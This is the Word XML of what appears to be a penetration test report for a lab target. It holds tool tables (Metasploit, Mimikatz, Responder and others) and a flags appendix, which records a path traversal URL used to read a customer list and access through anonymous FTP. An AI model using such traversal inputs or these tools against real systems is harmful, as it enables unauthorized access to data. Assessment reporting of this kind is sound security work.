                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="02BBC65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65361E7F" w14:textId="515DF39D" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nmap Scripting Engine (NSE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683CE220" w14:textId="07F01D14" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://nmap.org/book/nse.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="23EEDA95"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78B57E00" w14:textId="171EAED6" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65AFCA40" w14:textId="03C2FBE6" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId52" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/sullo/nikto</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AC2FA2B" w14:textId="0504293A" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAE553D" w14:textId="6B57286B" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc129370256"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation and </w:t>
      </w:r>
      <w:r w:rsidR="001911E4" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1B232A90"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3720C5D6" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5280C6" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="67A7E7C9"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F2488E4" w14:textId="2CD115ED" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CrackMapExec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A45D9C" w14:textId="68EF1B18" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId53" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/crackmapexec/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="63E0BA22"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2F73FA1D" w14:textId="4F1879B7" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4EFA30" w14:textId="17EEAEBD" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.metasploit.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="212716E4"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3F519B1E" w14:textId="0E7181BC" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B8B5E6" w14:textId="0345D64A" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId55" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/ParrotSec/mimikatz</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2D714BD1"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3A5F69A" w14:textId="4363CDCB" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F2609D" w14:textId="322E98B7" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId56" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/PowerShellMafia/PowerSploit</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0E383DA8"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6E76502A" w14:textId="67B66618" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BEE40C9" w14:textId="660E70A2" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId57" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/SpiderLabs/Responder</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F51E7DC" w14:textId="77777777" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5882A859" w14:textId="229847BB" w:rsidR="00B51483" w:rsidRDefault="00B51483">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740D4D0" w14:textId="4D2E7D60" w:rsidR="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7E27B" w14:textId="7032B189" w:rsidR="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400E4EA" w14:textId="59C7D9D5" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r>
        <w:t>http://10.10.0.66/data/flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D72EA" w14:textId="1917640B" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag 1 was accessible through the web application without authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FA046" w14:textId="0C3D97D6" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417FA4E5" wp14:editId="0D766B5F">
            <wp:extent cx="3581400" cy="2066925"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="1339615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548" name="Picture 1"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2066925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B51483">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70F117" w14:textId="5E610A03" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CE8018C" w14:textId="2A2233C9" w:rsidR="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B902EA1" w14:textId="70F9A13F" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51483">
        <w:t>http://10.10.0.66/internal/customers.php?list</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B51483">
        <w:t>=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B51483">
        <w:t>%2Fdata%2Fcustomer.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55599700" w14:textId="599CD61C" w:rsidR="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was accessible through the web application </w:t>
      </w:r>
      <w:r>
        <w:t>with authorized user access</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13D9A0" w14:textId="3B877B3D" w:rsidR="00B51483" w:rsidRPr="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E6B454" wp14:editId="03FDA04B">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="25400"/>
            <wp:docPr id="566404813"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4813" name="Picture 2" descr="Graphical user interface, text&#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w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47049E7C" w14:textId="2B104107" w:rsidR="00250115" w:rsidRDefault="00250115">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABEFE4B" w14:textId="1FFBB83D" w:rsidR="00250115" w:rsidRDefault="00250115" w:rsidP="00250115">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E72F7" w14:textId="0E7CAF70" w:rsidR="00250115" w:rsidRPr="00B51483" w:rsidRDefault="00250115" w:rsidP="00250115">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r w:rsidR="00183FB3" w:rsidRPr="00183FB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="00183FB3" w:rsidRPr="00183FB3">
        <w:t>~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00183FB3" w:rsidRPr="00183FB3">
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00183FB3" w:rsidRPr="00183FB3">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD40E7" w14:textId="2B9CB402" w:rsidR="00250115" w:rsidRDefault="00250115" w:rsidP="00250115">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00183FB3">
        <w:t>Accessible through anonymous FTP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00183FB3" w14:paraId="0DDFEA2F" w14:textId="77777777" w:rsidTr="00183FB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3A7CF799" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">cat flag3                                                          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673381F8" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0DFBAF" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> belongs to an elite order, a hallowed subcategory. He's got esprit up to here. Right now, he is preparing to carry out his third mission of the night. His uniform is black as activated charcoal, filtering the very light out of the air. A bullet will bounce off its </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arachnofiber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> weave like a wren hitting a patio door, but excess perspiration wafts through it like a breeze through a freshly napalmed forest, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Where</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> his body has bony extremities, the suit has sintered </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>armorgel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: feels like gritty </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jello</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, protects like a stack of telephone books.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397D3454" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">When they gave him the job, they gave him a gun. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dcliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> never deals in cash, but someone might come after him anyway-might want his car, or his cargo. The gun is tiny, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>acm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134D467F" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="169630A9" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">styled, lightweight, the kind of gun a fashion designer would carry; it fires teensy darts that fly at five times the velocity of an SR-71 spy plane, and when you get done using it, you </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> plug it into the cigarette lighter, because it runs on electricity.</w:t>
            </w:r>
          </w:p>
